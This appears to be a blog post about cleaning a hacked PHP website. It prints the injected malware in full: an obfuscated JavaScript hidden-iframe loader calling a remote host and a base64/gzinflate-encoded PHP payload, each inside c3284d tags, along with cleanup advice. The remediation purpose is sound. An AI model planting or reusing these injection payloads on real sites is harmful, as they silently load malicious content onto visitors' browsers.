Hi,
Today one of my friends turned to me by a problem on her web server which running PHP gave T_String error.
First I ought it to be a coding error but it seems that as it occurs quite often and not by my friend doing sth as if it were a malicious code inserting /hacking attempt.
When trying to look into that problem - scanning other files via web - Avast WebShield blocked that site/page giving out “JS:Iframe-FG [Trj]” trojan notice (it was html file in question).
When looking into file there was code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta http-equiv="refresh" content="0; url=hXXp://www.haagissuvilad.ee
"><title>Redirect</title></head><body><!--c3284d--><script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'hXXp://heartofpole.net/xml.php'
);
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);
</script><!--/c3284d-->
<div align="center">Kui teie lehitseja ei toeta suunamist siis vajutage <a href="hXXp://www.haagissuvilad.ee
">siia</a> to be redirected</div></body></html>
As I was the one that for ages ago had created that html file I did not remember to adding there any code with “c3284d”.
Turns out that particular code insertion is widely known and has been put on many other websites.
More info in: stopmalvertising.com - the-c3284d-malware-network-stats
When investigateing the T_String error I also found code inserted in index.php file:
#c3284d#
echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw==")));
#/c3284d#
So as you see - the problem/threat is real.
NB! To get rid of that malicious code or Avast reporting your site as “infected with JS:Iframe-FG [Trj]” just try to scan your server root and look for pre mentioned tag “c3284d” in your code. When removing everything between and with that tag - problem is solved - no malicious reports and website works again! Or you can just overwrite infected file with old copy if you happen to have one!
NB! So I have found new code on other .htaccess files with tag “b58b6f” so principally watch out for any suspicious code with tags!
(If you happen to use Dreamveawer than for me it pointed out places in code with those tags because original code has been broken by insertion)
Hope that this post helps you out there!
Cheers,
Kristjan T.
